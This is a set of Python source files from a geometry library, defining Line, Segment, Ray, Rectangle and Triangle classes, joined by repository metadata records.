    def isHorizontal(self):
        '''
        True iff A and B share the same y coordinate, boolean.
        '''
        return (self.A.y == self.B.y)

    @property
    def isCoplanar(self):
        # XXX four points are needed to determine true coplanarity;
        #     this only checks that A and B share the same z coordinate.
        '''
        True iff A and B share the same z coordinate, boolean.
        '''
        return (self.A.z == self.B.z)

    @property
    def m(self):
        '''
        Slope parameter, Point(B - A).
        '''
        return self.B - self.A

    @property
    def length(self):
        '''
        Lines have an infinite length, raises InfiniteLength() exception.
        '''
        raise InfiniteLength()

    @property
    def normal(self):
        '''
        :return: Line

        Returns a Line normal (perpendicular) to this Line.
        '''
        d = self.B - self.A
        return Line([-d.y, d.x], [d.y, -d.x])

    def pointAt(self, t):
        '''
        :t: float parameter
        :return: Point subclass

        Varying 't' will produce a new Point along this Line.

        t = 0 -> point A
        t = 1 -> point B
        '''
        # p<xyz> = A<xyz> + t * ( B<xyz> - A<xyz> )
        return self.A + (t * self.m)

    def t(self, point):
        '''
        :point: Point subclass
        :return: float

        If :point: is collinear, determine the 't' coefficient of
        the parametric equation:

        xyz = A<xyz> + t ( B<xyz> - A<xyz> )

        if t < 0, point is less than A and B on the line
        if t >= 0 and <= 1, point is between A and B
        if t > 1 point is greater than B
        '''
        if point not in self:
            msg = "'{p}' is not collinear with '{l}'"
            raise CollinearPoints(msg.format(p=point, l=self))
        # p = A + t ( B - A )  =>  t = (p - A) / (B - A)
        return (point - self.A) / self.m

    def __str__(self):
        '''
        Human-readable description of both defining points.
        '''
        return 'A=({l.A}), B=({l.B})'.format(l=self)

    def __repr__(self):
        '''
        Returns a representation string of this instance.
        '''
        return '{l.__class__.__name__}({l!s})'.format(l=self)

    def __len__(self):
        '''
        Treat a line as a two item container with length '2'.
        '''
        return 2

    def __getitem__(self, key):
        '''
        index zero or 'A' is equivalent to property A
        index one or 'B' is equivalent to property B

        Raises TypeError for any other key.
        '''
        if key == 'A' or key == 0:
            return self.A
        # BUG FIX: B's integer index is 1; it was previously compared
        # against 0, which made line[1] raise TypeError.
        if key == 'B' or key == 1:
            return self.B
        raise TypeError(key)

    def __setitem__(self, key, value):
        '''
        index zero or 'A' is equivalent to property A
        index one or 'B' is equivalent to property B

        Raises TypeError for any other key.
        '''
        if key == 'A' or key == 0:
            self.A = value
            return
        # BUG FIX: B's integer index is 1 (was compared against 0), and a
        # successful assignment must return instead of falling through to
        # the unconditional TypeError below.
        if key == 'B' or key == 1:
            self.B = value
            return
        raise TypeError(key)

    def __contains__(self, other):
        '''
        p in l

        Returns True iff p is a point and is collinear with l.A and
        l.B.

        Returns True iff p is a line and p.A and p.B are collinear
        with l.A and l.B.
        '''
        otherType = type(other)

        if issubclass(otherType, Point):
            return self.A.isCollinear(other, self.B)

        if issubclass(otherType, Line):
            if not self.A.isCollinear(other.A, other.B):
                return False
            return self.B.isCollinear(other.A, other.B)

        raise TypeError('unable to contain type {t}'.format(t=otherType))

    def flip(self):
        '''
        :returns: None

        Swaps the positions of A and B.
        '''
        # copy A's coordinates first; assigning self.A mutates in place
        tmp = self.A.xyz
        self.A = self.B
        self.B = tmp

    def doesIntersect(self, other):
        '''
        :param: other - Line subclass
        :return: boolean

        Returns True iff:
           ccw(self.A,self.B,other.A) * ccw(self.A,self.B,other.B) <= 0
           and
           ccw(other.A,other.B,self.A) * ccw(other.A,other.B,self.B) <= 0
        '''
        if self.A.ccw(self.B, other.A) * self.A.ccw(self.B, other.B) > 0:
            return False
        if other.A.ccw(other.B, self.A) * other.A.ccw(other.B, self.B) > 0:
            return False
        return True

    def isParallel(self, other):
        '''
        :param: other - Line subclass
        :return: boolean

        Returns true if the two lines do not intersect and are not collinear.
        '''
        return not self.doesIntersect(other)

    def isCollinear(self, other):
        '''
        :param: other - Line subclass
        :return: boolean

        Returns true if the two lines are collinear.
        '''
        return other in self

    def intersection(self, other):
        '''
        :param: other - Line subclass
        :return: Point subclass

        Returns a Point object with the coordinates of the intersection
        between the current line and the other line.

        Will raise ParallelLines() if the two lines are parallel.
        Will raise CollinearPoints() if the two lines are collinear.
        '''
        if self.isCollinear(other):
            msg = '{!r} and {!r} are collinear'
            # BUG FIX: 'CollinearLines' is neither defined nor imported;
            # raising it was a NameError.  Use the imported
            # CollinearPoints exception instead.
            raise CollinearPoints(msg.format(self, other))

        d0 = self.A - self.B
        d1 = other.A - other.B

        denominator = (d0.x * d1.y) - (d0.y * d1.x)

        if denominator == 0:
            msg = '{!r} and {!r} are parallel'
            raise ParallelLines(msg.format(self, other))

        cp0 = self.A.cross(self.B)
        cp1 = other.A.cross(other.B)

        x_num = (cp0 * d1.x) - (d0.x * cp1)
        y_num = (cp0 * d1.y) - (d0.y * cp1)

        p = Point(x_num / denominator, y_num / denominator)

        if p in self and p in other:
            return p

        msg = "found point {!r} but not in {!r} and {!r}"
        raise ParallelLines(msg.format(p, self, other))

    def distanceFromPoint(self, point):
        '''
        :param: point - Point subclass
        :return: float

        Distance from the line to the given point.
        '''
        # XXX planar distance, doesn't take into account z ?
        d = self.m
        n = (d.y * point.x) - (d.x * point.y) + self.A.cross(self.B)
        return abs(n / self.A.distance(self.B))

    def isNormal(self, other):
        '''
        :param: other - Line subclass
        :return: boolean

        Returns True if this line is perpendicular to the other line.
        '''
        return abs(self.degreesBetween(other)) == 90.0

    def radiansBetween(self, other):
        '''
        :param: other - Line subclass
        :return: float

        Returns the angle measured between two lines in radians
        with a range of [0, 2 * math.pi].
        '''
        # cos(theta) = a dot b / |a||b|; both lines are translated to the
        # origin and normalized, so the denominator is assumed to be 1.
        a = Point.unit(self.A, self.B)
        b = Point.unit(other.A, other.B)
        return math.acos(a.dot(b))

    def degreesBetween(self, other):
        '''
        :param: other - Line subclass
        :return: float

        Returns the angle between two lines measured in degrees.
        '''
        return math.degrees(self.radiansBetween(other))
class Segment(Line):
    '''
    A Line subclass with finite length.
    '''

    @property
    def length(self):
        '''
        The scalar distance between A and B, float.
        '''
        return self.A.distance(self.B)

    @property
    def midpoint(self):
        '''
        The point between A and B, Point subclass.
        '''
        return self.A.midpoint(self.B)

    def __eq__(self, other):
        '''
        x == y iff both segments share the same pair of endpoints,
        regardless of orientation.
        '''
        endpoints = set(self.AB)
        endpoints.update(other.AB)
        return len(endpoints) == 2

    def __contains__(self, other):
        '''
        p in s

        True iff other (a Point or Line subclass) is collinear with this
        segment and lies between its endpoints A and B.
        '''
        if not super().__contains__(other):
            return False

        if isinstance(other, Point):
            return other.isBetween(self.A, self.B)

        if isinstance(other, Line):
            startInside = other.A.isBetween(self.A, self.B)
            endInside = other.B.isBetween(self.A, self.B)
            return startInside and endInside

        raise TypeError('unable to contain type {t}'.format(t=type(other)))

    @property
    def normal(self):
        '''
        :return: Segment

        Returns a segment normal (perpendicular) to this segment.
        '''
        return Segment.fromLine(super().normal)
class Ray(Line):
    '''
    Rays have head and tail vertices with an infinite length in the
    direction of the head vertex.

    o----->
    '''

    @property
    def head(self):
        '''
        The start (endpoint) of the ray, Point subclass.
        '''
        return self.A

    @head.setter
    def head(self, newValue):
        self.A = newValue

    @property
    def tail(self):
        '''
        A point in the infinite direction of the ray, Point subclass.
        '''
        return self.B

    @tail.setter
    def tail(self, newValue):
        self.B = newValue

    def __eq__(self, other):
        '''
        x == y

        True when both rays start at the same head and y's tail is
        collinear with x's head and tail.
        '''
        if self.head != other.head:
            return False
        return other.tail.isCollinear(self.head, self.tail)

    def __contains__(self, point):
        '''
        Returns true if point can be found on this ray.
        '''
        # must be collinear with A and B, and not "behind" the head A
        if not self.A.isCollinear(point, self.B):
            return False
        return not self.A.isBetween(point, self.B)

    # Intersection-style operations need ray-specific overrides and are
    # deliberately left unimplemented.
    def doesIntersect(self, other):
        raise NotImplementedError('doesIntersect')

    def isParallel(self, other):
        raise NotImplementedError('isParallel')

    def isCollinear(self, other):
        raise NotImplementedError('isCollinear')

    def intersection(self, other):
        raise NotImplementedError('intersection')

    @property
    def alpha(self):
        '''
        Angle in radians relative to the X axis.
        '''
        raise NotImplementedError('alpha')

    @property
    def beta(self):
        '''
        Angle in radians relative to the Y axis.
        '''
        raise NotImplementedError('beta')

    @property
    def gamma(self):
        '''
        Angle in radians relative to the Z axis.
        '''
        raise NotImplementedError('gamma')

    @property
    def normal(self):
        '''
        :return: Ray

        Returns a ray normal (perpendicular) to this ray.
        '''
        return Ray.fromLine(super().normal)
# rays can be treated much like vectors so many of the point operations
# can be reused here
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/line.py",
"copies": "1",
"size": "14349",
"license": "mit",
"hash": 4776533943774270000,
"line_mean": 22.8752079867,
"line_max": 78,
"alpha_frac": 0.5185727228,
"autogenerated": false,
"ratio": 3.8823051948051948,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9900877917605194,
"avg_score": 0,
"num_lines": 601
} |
'''a pythonic Rectangle
Provides an implementation of a rectangle designed to be easy to use:
- built on a very friendly Point class
- provides a wealth of accessors that are read-write
'''
import random
import math
from . import Point
from .exceptions import *
class Rectangle(object):
'''
Implements a Rectangle object in the XY plane defined by
an origin point and scalars length and width.
All other properties are derived.
Note: Origin may have a non-zero z coordinate.
'''
@classmethod
def randomSizeAndLocation(cls, radius, widthLimits,
heightLimits, origin=None):
'''
:param: radius - float
:param: widthLimits - iterable of floats with length >= 2
:param: heightLimits - iterable of floats with length >= 2
:param: origin - optional Point subclass
:return: Rectangle
'''
r = cls(widthLimits, heightLimits, origin)
r.origin = Point.randomLocation(radius, origin)
@classmethod
def randomSize(cls, widthLimits, heightLimits, origin=None):
'''
:param: widthLimits - iterable of integers with length >= 2
:param: heightLimits - iterable of integers with length >= 2
:param: origin - optional Point subclass
:return: Rectangle
'''
r = cls(0, 0, origin)
r.w = random.randint(widthLimits[0], widthLimits[1])
r.h = random.randint(heightLimits[0], heightLimits[1])
return r
@classmethod
def randomLocation(cls, radius, width, height, origin=None):
'''
:param: radius - float
:param: width - float
:param: height - float
:param: origin - optional Point subclass
:return: Rectangle
'''
return cls(width,
height,
Point.randomLocation(radius, origin))
    def __init__(self, origin=None, width=1, height=1, theta=0):
        '''
        :param: origin - optional Point subclass or iterable of coordinates
        :param: width - float X distance from origin.x
        :param: height - float Y distance from origin.y
        :param: theta - accepted but currently unused; TODO confirm intent
        :return: Rectangle

        Returns a unit square anchored at the origin by default.
        '''
        # iter() raises TypeError for None (and any non-iterable),
        # leaving the lazily-created default origin of (0,0,0) intact.
        try:
            self.origin = iter(origin)
        except TypeError:
            pass
        self.width = width
        self.height = height
    @property
    def origin(self):
        '''
        Point describing the origin of the rectangle. Defaults to (0,0,0).
        '''
        # Lazy initialization: the backing Point is created on first
        # access so __init__ can skip it when no origin is supplied.
        try:
            return self._origin
        except AttributeError:
            pass
        self._origin = Point()
        return self._origin

    @origin.setter
    def origin(self, newOrigin):
        # assigning via origin.xyz mutates the existing Point in place
        # rather than rebinding the attribute
        self.origin.xyz = newOrigin

    @property
    def O(self):
        '''
        Shorthand for origin, Point.
        '''
        return self.origin

    @O.setter
    def O(self, newO):
        self.origin = newO
    @property
    def width(self):
        '''
        Width of the rectangle, float.
        '''
        # lazy default of 0 when the backing attribute is missing
        try:
            return self._width
        except AttributeError:
            pass
        self._width = 0
        return self._width

    @width.setter
    def width(self, newWidth):
        self._width = float(newWidth)

    @property
    def height(self):
        '''
        Height of the rectangle, float.
        '''
        # lazy default of 0 when the backing attribute is missing
        try:
            return self._height
        except AttributeError:
            pass
        self._height = 0
        return self._height

    @height.setter
    def height(self, newHeight):
        self._height = float(newHeight)

    @property
    def w(self):
        '''
        Shorthand for width, float.
        '''
        return self.width

    @w.setter
    def w(self, newWidth):
        self.width = newWidth

    @property
    def h(self):
        '''
        Shorthand for height, float.
        '''
        return self.height

    @h.setter
    def h(self, newHeight):
        self.height = newHeight
    # The following coordinate properties all delegate to the origin Point.
    @property
    def x(self):
        '''
        Shorthand for origin.x, float.
        '''
        return self.origin.x

    @x.setter
    def x(self, newX):
        self.origin.x = newX

    @property
    def y(self):
        '''
        Shorthand for origin.y, float.
        '''
        return self.origin.y

    @y.setter
    def y(self, newY):
        self.origin.y = newY

    @property
    def z(self):
        '''
        Shorthand for origin.z, float.
        '''
        return self.origin.z

    @z.setter
    def z(self, newZ):
        self.origin.z = newZ

    @property
    def xy(self):
        '''
        Shorthand for origin.xy, iterable of floats.
        '''
        return self.origin.xy

    @xy.setter
    def xy(self, newXY):
        self.origin.xy = newXY

    @property
    def xz(self):
        '''
        Shorthand for origin.xz, iterable of floats.
        '''
        return self.origin.xz

    @xz.setter
    def xz(self, newXZ):
        self.origin.xz = newXZ

    @property
    def yz(self):
        '''
        Shorthand for origin.yz, iterable of floats.
        '''
        return self.origin.yz

    @yz.setter
    def yz(self, newYZ):
        self.origin.yz = newYZ

    @property
    def xyz(self):
        '''
        Shorthand for origin.xyz, iterable of floats.
        '''
        return self.origin.xyz

    @xyz.setter
    def xyz(self, newXYZ):
        self.origin.xyz = newXYZ
    # Axis-aligned extrema, derived from origin, width and height.
    @property
    def minX(self):
        '''
        Minimum X coordinate boundary, float.
        '''
        return self.origin.x

    @property
    def midX(self):
        '''
        Middle X coordinate, float.
        '''
        return self.origin.x + (self.width / 2)

    @property
    def maxX(self):
        '''
        Maximum X coordinate boundary, float.
        '''
        return self.origin.x + self.width

    @property
    def minY(self):
        '''
        Minimum Y coordinate, float.
        '''
        return self.origin.y

    @property
    def midY(self):
        '''
        Middle Y coordinate, float.
        '''
        return self.origin.y + (self.height / 2)

    @property
    def maxY(self):
        '''
        Maximum Y coordinate, float.
        '''
        return self.origin.y + self.height
    # Note: The setters for the following points don't actually
    # create that point. Instead they adjust the rectangle's
    # origin with respect to the requested point.
    @property
    def A(self):
        '''
        Point whose coordinates are (minX,minY,origin.z), Point.
        '''
        return Point(self.origin)

    @A.setter
    def A(self, newA):
        self.origin = newA

    @property
    def B(self):
        '''
        Point whose coordinates are (maxX,minY,origin.z), Point.
        '''
        return Point(self.maxX, self.minY, self.origin.z)

    @B.setter
    def B(self, newB):
        # shift origin left so corner B coincides with newB
        self.origin = newB
        self.origin.x -= self.width

    @property
    def C(self):
        '''
        Point whose coordinates are (maxX,maxY,origin.z), Point.
        '''
        return Point(self.maxX, self.maxY, self.origin.z)

    @C.setter
    def C(self, newC):
        # shift origin left and down so corner C coincides with newC
        self.origin = newC
        self.origin.x -= self.width
        self.origin.y -= self.height

    @property
    def D(self):
        '''
        Point whose coordinates are (minX,maxY,origin.Z), Point.
        '''
        return Point(self.minX, self.maxY, self.origin.z)

    @D.setter
    def D(self, newD):
        # shift origin down so corner D coincides with newD
        self.origin = newD
        self.origin.y -= self.height

    @property
    def center(self):
        '''
        Point whose coordinates are (midX,midY,origin.z), Point.
        '''
        return Point(self.midX, self.midY, self.origin.z)

    @center.setter
    def center(self, newCenter):
        # shift origin so the rectangle is centered on newCenter
        self.origin = newCenter
        self.origin.x -= (self.width / 2)
        self.origin.y -= (self.height / 2)
@property
def midAB(self):
'''
Point inbetween A and B, Point.
'''
return self.A.midpoint(B)
@midAB.setter
def midAB(self, newMidAB):
self.origin = newMidAB
self.origin.x -= (self.width / 2)
@property
def midBC(self):
'''
Point inbetween B and C, Point.
'''
return self.B.midpoint(C)
@midBC.setter
def midBC(self, newMidBC):
self.origin = newMidBC
self.origin.x -= self.width
self.origin.y -= (self.height / 2)
@property
def midCD(self):
'''
Point inbetween C and D, Point.
'''
return self.C.midpoint(D)
@midCD.setter
def midCD(self, newMidCD):
self.origin = newMidCD
self.origin.x -= (self.width / 2)
self.origin.y -= self.height
@property
def midAD(self):
'''
Point inbetween A and D, Point.
'''
return self.A.midpoint(D)
@midAD.setter
def midAD(self, newMidAD):
self.origin = newMidAD
self.origin.y -= (self.height / 2)
@property
def perimeter(self):
'''
The perimeter of the rectangle, float.
'''
return (self.width * 2) + (self.height * 2)
@property
def area(self):
'''
The area of the rectangle, float.
'''
return self.width * self.height
@property
def isSquare(self):
'''
Is true if self.width == self.height.
'''
return self.width == self.height
@property
def isRectangle(self):
'''
Is true if self.width != self.height.
'''
return self.width != self.height
    @property
    def isCCW(self):
        '''
        Is true if the angle ABC denotes a counter clockwise rotation
        with respect to the Z axis.
        '''
        # Delegates the orientation test to Point.isCCW on corners A, B, C.
        return self.A.isCCW(self.B, self.C)
    @property
    def ccw(self):
        '''
        Returns the CCW value for the rectangle using the angle ABC with
        respect to the Z axis.
        >0 : counter clockwise and the area of the parallelepiped
        0 : collinear, not generally possible in a well-formed rectangle
        <0 : clockwise and the negative area of the parallelepiped
        '''
        return self.A.ccw(self.B, self.C)
@property
def mapping(self):
'''
A mapping of rectangle attribute names to attribute values, dict.
'''
return {'origin': self.origin,
'width': self.width,
'height': self.height}
def __str__(self):
'''
'''
output = 'origin={origin},width={width},height={height}'
return output.format(**self.mapping)
def __repr__(self):
'''
'''
return '{klass}({args})'.format(klass=self.__class__.__name__,
args=str(self))
def __eq__(self, other):
'''
x == y iff:
x.origin == y.origin
x.width == y.width
x.height == y.height
'''
oeq = self.origin == other.origin
weq = self.w == other.w
heq = self.h == other.h
return oeq and weq and heq
def __contains__(self, other):
'''
:param: other - Rectangle subclass
:return: boolean
x in y iff:
(y.A in x) or (y.B in x) or (y.C in x) or (y.D in x)
'''
# does ccw/cw of self or other matter here?
if self.containsPoint(other.A):
return True
if self.containsPoint(other.B):
return True
if self.containsPoint(other.C):
return True
if self.containsPoint(other.D):
return True
return False
    def scale(self, dx=1.0, dy=1.0):
        '''
        :param: dx - optional float
        :param: dy - optional float
        Scales the rectangle's width and height by dx and dy.
        '''
        # The origin is left untouched; only the extents grow/shrink.
        self.width *= dx
        self.height *= dy
def inset(self, other, percentage):
'''
:param: other - Rectangle subclass
:param: percentagle - float
'''
raise NotImplemented('inset')
def union(self, other):
'''
:param: other - Rectangle subclass
'''
# returns a rectangle composed of the bounds of self and other
raise NotImplemented('union')
def intersect(self, other):
'''
:param: other - Rectangle subclass
'''
# returns an iterable of rectangles that compose the intersection
# a limit of 0 to 4 rects?
raise NotImplemented('intersect')
    def containsPoint(self, point, Zorder=False):
        '''
        :param: point - Point subclass
        :param: Zorder - optional Boolean
        Is true if the point is contained in the rectangle or
        along the rectangle's edges.
        If Zorder is True, the method will check point.z for
        equality with the rectangle origin's Z coordinate.
        '''
        # A-B spans the rectangle's X extent, A-D spans its Y extent.
        if not point.isBetweenX(self.A, self.B):
            return False
        if not point.isBetweenY(self.A, self.D):
            return False
        if Zorder:
            # Exact float equality -- points on a different Z plane fail.
            return point.z == self.origin.z
        return True
def zorder(self, other):
'''
:param: other - Rectangle subclass
:return: float
>0: self < other
0: self eq other
<0: self > other
'''
return other.origin.z - self.origin.z
def flipX(self):
'''
:return: None
Inverts the X axis of the rectangle.
'''
self.width *= -1
def flipY(self):
'''
:return: None
Inverts the Y axis of the rectangle.
'''
self.height *= -1
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/rectangle.py",
"copies": "1",
"size": "13704",
"license": "mit",
"hash": -362437887190386200,
"line_mean": 22.4657534247,
"line_max": 74,
"alpha_frac": 0.5340776416,
"autogenerated": false,
"ratio": 4.068883610451306,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0003503485968538696,
"num_lines": 584
} |
''' a pythonic Triangle
'''
import collections
import collections.abc
import itertools
import math

from . import Point, Segment, Circle
from .constants import Epsilon, Half_Pi, nearly_eq, Sqrt_3
from .exceptions import *
class Triangle(object):
'''a pythonic Triangle
Implements a Triangle object in the XY plane having three
non-coincident vertices and three intersecting edges.
Vertices are labeled; 'A', 'B' and 'C'.
Edges are labeled; 'AB', 'BC' and 'AC'.
The length of edges opposite each vertex are labeled:
'a' for the side opposite vertex A.
'b' for the side opposite vertex B.
'c' for the side opposite vertex C.
Interior angles in radians are labeled:
'alpha' for CAB
'beta' for ABC
'gamma' for BCA
Usage:
>>> a = Triangle()
>>> b = Triangle(A,B,C) # A,B,C are Points or Point equivalents
>>> c = Triangle([p,q,r]) # p,q,r are Points or Point equivalents
>>> d = Triangle([x,y,z],[x,y,z],[x,y,z])
>>> e = Triangle(A=p0,B=p1,C=p2)
'''
vertexNames = 'ABC'
@classmethod
def random(cls, origin=None, radius=1):
'''
:origin: - optional Point subclass
:radius: - optional float
:return: Triangle
Creates a triangle with random coordinates in the circle
described by (origin,radius). If origin is unspecified, (0,0)
is assumed. If the radius is unspecified, 1.0 is assumed.
'''
# XXX no collinearity checks, possible to generate a
# line (not likely, just possible).
#
pts = set()
while len(pts) < 3:
p = Point.random(origin, radius)
pts.add(p)
return cls(pts)
@classmethod
def equilateral(cls, origin=None, side=1):
'''
:origin: optional Point
:side: optional float describing triangle side length
:return: Triangle initialized with points comprising a
equilateral triangle.
XXX equilateral triangle definition
'''
o = Point(origin)
base = o.x + side
h = 0.5 * Sqrt_3 * side + o.y
return cls(o, [base, o.y], [base / 2, h])
#return cls.withAngles(alpha=60,beta=60,gamma=60,base=side,inDegrees=True)
@classmethod
def isosceles(cls, origin=None, base=1, alpha=90):
'''
:origin: optional Point
:base: optional float describing triangle base length
:return: Triangle initialized with points comprising a
isosceles triangle.
XXX isoceles triangle definition
'''
o = Point(origin)
base = o.x + base
return cls(o, [base, o.y], [base / 2, o.y + base])
    @classmethod
    def withAngles(cls, origin=None, base=1, alpha=None,
                   beta=None, gamma=None, inDegrees=False):
        '''
        :origin: optional Point
        :alpha: optional float describing length of the side opposite A
        :beta: optional float describing length of the side opposite B
        :gamma: optional float describing length of the side opposite C
        :return: Triangle initialized with points comprising the triangle
        with the specified angles.
        NOTE(review): per the method name and the inDegrees flag, alpha,
        beta and gamma are presumably *angles*, not side lengths as the
        parameter descriptions above claim -- confirm when implementing.
        '''
        raise NotImplementedError("withAngles")
    @classmethod
    def withSides(cls, origin=None, a=1, b=1, c=1):
        '''
        :origin: optional Point
        :a: optional float describing length of the side opposite A
        :b: optional float describing length of the side opposite B
        :c: optional float describing length of the side opposite C
        :return: Triangle initialized with points comprising the triangle
        with the specified side lengths.
        If only 'a' is specified, an equilateral triangle is returned.
        '''
        raise NotImplementedError("withSides")
    @classmethod
    def unit(cls):
        '''
        Returns a unit triangle built from Point.units().
        '''
        return cls(Point.units())
def __init__(self, *args, **kwds):
self(*args, **kwds)
def __call__(self, *args, **kwds):
'''
Arguments are:
- positional arguments corresponding to A, B, and C
- sequence of Point or point equivalents
- keyword mappings: A, B and C
'''
# XXX not happy with this yet
if len(args) == 0 and len(kwds) == 0:
return
if len(args) == 1:
if issubclass(type(args[0]), Point):
self.A = args[0]
else:
if isinstance(args[0], collections.Iterable):
if len(args[0]) == 1:
self.A = args[0]
if len(args[0]) == 2:
self.AB = args[0]
if len(args[0]) == 3:
self.ABC = args[0]
if len(args) == 2:
self.AB = args
if len(args) >= 3:
self.ABC = args[:3]
for name in self.vertexNames:
try:
setattr(self, name, kwds[name])
except:
pass
    @property
    def A(self):
        '''
        First vertex of triangle, Point subclass.
        '''
        # Lazily defaults to Point() (the origin) on first access.
        try:
            return self._A
        except AttributeError:
            pass
        self._A = Point()
        return self._A
    @A.setter
    def A(self, newValue):
        # Updates the existing Point in place via its xyz setter, so any
        # cached lists (ABC, AB, ...) that hold this object stay current.
        self.A.xyz = newValue
    @property
    def B(self):
        '''
        Second vertex of triangle, Point subclass.
        '''
        # Lazily defaults to Point(1, 0) on first access.
        try:
            return self._B
        except AttributeError:
            pass
        self._B = Point(1, 0)
        return self._B
    @B.setter
    def B(self, newValue):
        self.B.xyz = newValue
    @property
    def C(self):
        '''
        Third vertex of triangle, Point subclass.
        '''
        # Lazily defaults to Point(0, 1) on first access.
        try:
            return self._C
        except AttributeError:
            pass
        self._C = Point(0, 1)
        return self._C
    @C.setter
    def C(self, newValue):
        self.C.xyz = newValue
    @property
    def ABC(self):
        '''
        A list of the triangle's vertices, list.
        '''
        # The list is built once and cached; it holds the live Point
        # objects, so in-place coordinate updates remain visible.
        try:
            return self._ABC
        except AttributeError:
            pass
        self._ABC = [self.A, self.B, self.C]
        return self._ABC
    @ABC.setter
    def ABC(self, iterable):
        # Delegates to the A/B/C setters (in-place Point updates).
        self.A, self.B, self.C = iterable
    # Each vertex-pair property below caches its list (_AB, _BA, ...) on
    # first access. The lists hold the live Point objects, so coordinate
    # updates made through the A/B/C setters remain visible in them.
    @property
    def AB(self):
        '''
        Vertices A and B, list.
        '''
        try:
            return self._AB
        except AttributeError:
            pass
        self._AB = [self.A, self.B]
        return self._AB
    @AB.setter
    def AB(self, iterable):
        self.A, self.B = iterable
    @property
    def BA(self):
        '''
        Vertices B and A, list.
        '''
        try:
            return self._BA
        except AttributeError:
            pass
        self._BA = [self.B, self.A]
        return self._BA
    @BA.setter
    def BA(self, iterable):
        self.B, self.A = iterable
    @property
    def AC(self):
        '''
        Vertices A and C, list.
        '''
        try:
            return self._AC
        except AttributeError:
            pass
        self._AC = [self.A, self.C]
        return self._AC
    @AC.setter
    def AC(self, iterable):
        self.A, self.C = iterable
    @property
    def CA(self):
        '''
        Vertices C and A, list.
        '''
        try:
            return self._CA
        except AttributeError:
            pass
        self._CA = [self.C, self.A]
        return self._CA
    @CA.setter
    def CA(self, iterable):
        self.C, self.A = iterable
    @property
    def BC(self):
        '''
        Vertices B and C, list.
        '''
        try:
            return self._BC
        except AttributeError:
            pass
        self._BC = [self.B, self.C]
        return self._BC
    @BC.setter
    def BC(self, iterable):
        self.B, self.C = iterable
    @property
    def CB(self):
        '''
        Vertices C and B, list.
        '''
        try:
            return self._CB
        except AttributeError:
            pass
        self._CB = [self.C, self.B]
        return self._CB
    @CB.setter
    def CB(self, iterable):
        self.C, self.B = iterable
    @property
    def vertices(self):
        '''
        Alias for property "ABC", list.
        '''
        return self.ABC
    @vertices.setter
    def vertices(self, iterable):
        self.ABC = iterable
    @property
    def segments(self):
        '''
        A list of the Triangle's line segments [AB, BC, AC], list.
        '''
        # Fresh Segment objects are built on every access.
        # NOTE(review): whether Segment copies or aliases the endpoint
        # Points is defined by Segment -- confirm before mutating them.
        return [Segment(self.AB),
                Segment(self.BC),
                Segment(self.AC)]
@property
def hypotenuse(self):
'''
The longest side of the triangle, Segment.
If the triangle is an equilateral, the first Segment
in the segments property is returned.
'''
return max(self.segments,key=lambda s:s.length)
    @property
    def centroid(self):
        '''
        Intersection of the medians, Point.
        '''
        # Arithmetic mean of the vertices; relies on Point supporting
        # sum() (addition with int 0) and division by a scalar.
        return sum(self.vertices) / 3
@property
def incenter(self):
'''
The intersection of angle bisectors, Point.
'''
return sum([s * p for s, p in zip(self.sides, self.vertices)]) / 3
    @property
    def inradius(self):
        '''
        The radius of the triangle's incircle, float.
        '''
        ## XXX need to know the points on the triangle
        ## where the incircle touches to verify the
        ## inradius computation. Could verify by
        ## intersecting each segment with the circle
        ## and checking to make sure the segment is
        ## a tangent.
        # r = area / semiperimeter, written as 2*area / perimeter.
        return (self.area * 2) / self.perimeter
    @property
    def incircle(self):
        '''
        The circle inscribed in the triangle whose center
        is at 'incenter' with radius 'inradius', Circle.
        '''
        return Circle(self.incenter, self.inradius)
    @property
    def circumcenter(self):
        '''
        The intersection of the median perpendicular bisectors, Point.
        The center of the circumscribed circle, which is the circle that
        passes through all vertices of the triangle.
        https://en.wikipedia.org/wiki/Circumscribed_circle#Cartesian_coordinates_2
        BUG: only finds the circumcenter in the XY plane
        '''
        # Right triangles short-circuit: the circumcenter is the midpoint
        # of the hypotenuse.
        if self.isRight:
            return self.hypotenuse.midpoint
        if self.A.isOrigin:
            t = self
        else:
            # translate triangle to origin
            t = Triangle(self.A - self.A, self.B - self.A, self.C - self.A)
        # XXX translation would be easier by defining add and sub for points
        # t = self - self.A
        if not t.A.isOrigin:
            raise ValueError('failed to translate {} to origin'.format(t))
        # Cartesian circumcenter formula for a triangle with A at the
        # origin; the A offset is added back at the end.
        BmulC = t.B * t.C.yx
        d = 2 * (BmulC.x - BmulC.y)
        bSqSum = sum((t.B ** 2).xy)
        cSqSum = sum((t.C ** 2).xy)
        x = (((t.C.y * bSqSum) - (t.B.y * cSqSum)) / d) + self.A.x
        y = (((t.B.x * cSqSum) - (t.C.x * bSqSum)) / d) + self.A.y
        return Point(x, y)
    @property
    def circumradius(self):
        '''
        Distance from the circumcenter to all the verticies in
        the Triangle, float.
        '''
        # R = (a*b*c) / (4 * area).
        return (self.a * self.b * self.c) / (self.area * 4)
    @property
    def circumcircle(self):
        '''
        A circle whose center is equidistant from all the
        vertices in the triangle, Circle.
        '''
        return Circle(self.circumcenter, self.circumradius)
    @property
    def orthocenter(self):
        '''
        The intersection of the altitudes of the triangle, Point.
        Not yet implemented.
        '''
        raise NotImplementedError('orthocenter')
@property
def midpoints(self):
'''
The midpoints for segments AB, BC and AC, list of Points.
'''
return [s.midpoint for s in self.segements]
    @property
    def alpha(self):
        '''
        The angle described by angle CAB in radians, float.
        '''
        return Segment(self.CA).radiansBetween(Segment(self.BA))
    @property
    def beta(self):
        '''
        The angle described by angle ABC in radians, float.
        '''
        return Segment(self.AB).radiansBetween(Segment(self.CB))
    @property
    def gamma(self):
        '''
        The angle described by angle BCA in radians, float.
        '''
        return Segment(self.BC).radiansBetween(Segment(self.AC))
    @property
    def angles(self):
        '''
        List of angles [alpha, beta, gamma], list of floats.
        '''
        return [self.alpha, self.beta, self.gamma]
    @property
    def a(self):
        '''
        The length of line segment BC, opposite vertex A, float.
        '''
        return abs(self.B.distance(self.C))
    @property
    def b(self):
        '''
        The length of line segment AC, opposite vertex B, float.
        '''
        return abs(self.A.distance(self.C))
    @property
    def c(self):
        '''
        The length of line segment AB, opposite vertex C, float.
        '''
        return abs(self.A.distance(self.B))
    @property
    def sides(self):
        '''
        A list of side lengths [a, b, c], list of floats.
        '''
        return [self.a, self.b, self.c]
    @property
